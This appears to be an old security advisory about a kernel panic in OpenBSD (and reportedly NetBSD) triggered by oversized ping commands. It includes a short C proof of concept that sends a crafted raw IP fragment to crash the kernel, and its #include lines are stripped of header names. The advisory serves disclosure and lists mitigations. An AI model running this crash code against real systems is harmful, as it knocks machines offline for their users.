COMMAND ping SYSTEMS AFFECTED OpenBSD PROBLEM Ficus carica found following on his OpenBSD.current PPP system: ping -s2955 1.2.3.4 or ping -s1455 1.2.3.4 causes kernel panic Thankfully this bug does NOT appear to be remotely exploitable. There is second hand confirmation that this problem exists under netbsd as well. Note that it seems in order for the previous commands to cause reboot, the system must NOT have a default route. This could tend to reduce the impact of the bug. Note also that this bug don't work for big number of cases and it's only bug. Anyway, code follows: /* 1-3 bytes of fragment data will cause panic. */ /* ping -pff -s2955 to some interface with an MTU of 1500 bytes */ /* will recreate this packet, so it's clearly legal. */ /* If it doesn't work, mail me for the original program. */ /* Ficus carica */ #include #include #include char buf[] = "\x45\x00\x00\x17\x02\x7A\x01\x72\xFF\x01\xA7\xE6" "\x01\x02\x03\x04\x05\x06\x07\x08\xFF\xFF\xFF"; /* will not panic with more than three bytes ^^ ^^ ^^ */ main() { struct sockaddr_in thesocket; int sockd, on = 1; thesocket.sin_family = AF_INET; thesocket.sin_addr.s_addr = inet_addr("127.0.0.1"); sockd = socket(AF_INET,SOCK_RAW,IPPROTO_RAW); setsockopt(sockd,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on)); sendto(sockd, buf, sizeof(buf)-1, 0x0, (struct sockaddr *)&thesocket, sizeof(thesocket)); close(sockd); /* buf - 1 because of null terminator */ } SOLUTION Fix should be read as: 1: chmod a-s /usr/sbin/traceroute /sbin/ping 2: avoid goofing around with home made packet fraggers